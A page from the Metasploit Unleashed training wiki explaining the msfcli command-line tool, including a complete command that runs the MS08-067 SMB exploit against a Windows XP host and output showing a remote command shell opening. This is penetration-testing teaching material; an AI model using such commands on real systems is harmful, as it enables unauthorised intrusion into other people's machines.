Msfcli

From Metasploit Unleashed
Jump to: navigation, search

Msfcli provides a powerful command-line interface to the framework. 

root@bt:~# msfcli -h
Usage: /opt/framework/msf3/msfcli   [mode]
======================================================================

    Mode           Description
    ----           -----------
    (A)dvanced     Show available advanced options for this module
    (AC)tions      Show available actions for this auxiliary module
    (C)heck        Run the check routine of the selected module
    (E)xecute      Execute the selected module
    (H)elp         You're looking at it baby!
    (I)DS Evasion  Show available ids evasion options for this module
    (O)ptions      Show available options for this module
    (P)ayloads     Show available payloads for this module
    (S)ummary      Show information about this module
    (T)argets      Show available targets for this exploit module


Note that when using msfcli, variables are assigned using '=' and that all options are case-sensitive. 

root@bt:~# msfcli windows/smb/ms08_067_netapi RHOST=192.168.1.100 PAYLOAD=windows/shell/bind_tcp E
[*] Please wait while we load the module tree...

 _                                                      _
/  \  / \        __                          _   __    /_/ __
| |\ /  | _____  \ \            ___   _____ | | /   \  _   \ \
| | \/| | | ___\ |- -|   /\    / __\ | -__/ | | | |  || | |- -|
|_|   | | | _|__  | |_  / -\ __\ \   | |    | |_ \__/ | |  | |_
      |/  |____/  \___\/ /\  \___/   \/      \__|     |_\  \___\



       =[ metasploit v4.2.0-dev [core:4.2 api:1.0]
+ -- --=[ 775 exploits - 411 auxiliary - 120 post
+ -- --=[ 238 payloads - 27 encoders - 8 nops
       =[ svn r14414 updated today (2011.12.14)

RHOST => 192.168.1.100
PAYLOAD => windows/shell/bind_tcp
[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 2 - lang:Unknown
[*] We could not detect the language pack, defaulting to English
[*] Selected Target: Windows XP SP2 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (240 bytes) to 192.168.1.100
[*] Command shell session 1 opened (192.168.1.5:53482 -> 192.168.1.100:4444) at 2011-12-14 21:13:55 -0500

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

If you aren't entirely sure about what options belong to a particular module, you can append the letter 'O' to the end of the string at whichever point you are stuck. 

root@bt:~# msfcli windows/smb/ms08_067_netapi O
[*] Please wait while we load the module tree...

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST                     yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

To display the payloads that are available for the current module, append the letter 'P' to the command-line string. 

root@bt:~# msfcli windows/smb/ms08_067_netapi RHOST=192.168.1.100 P
[*] Please wait while we load the module tree...

Compatible payloads
===================

   Name                                             Description
   ----                                             -----------
   generic/custom                                   Use custom string or file as payload. Set either PAYLOADFILE or
...snip...

The other options available to msfcli are available by issuing 'msfcli -h'.

Benefits of mscli

  • Supports the launching of exploits and auxiliary modules
  • Useful for specific tasks
  • Good for learning
  • Convenient to use when testing or developing a new exploit
  • Good tool for one-off exploitation
  • Excellent if you know exactly which exploit and options you need
  • Wonderful for use in scripts and basic automation


The only real drawback of msfcli is that it is not supported quite as well as msfconsole and it can only handle one shell at a time, making it rather impractical for client-side attacks. It also doesn't support any of the advanced automation features of msfconsole.


Metasploit Fundamentals > Msfcli

Msfcli | Msfweb | Msfconsole | Exploits | Payloads | About Meterpreter

Retrieved from "http://www.offensive-security.com/w/index.php?title=Msfcli&oldid=339"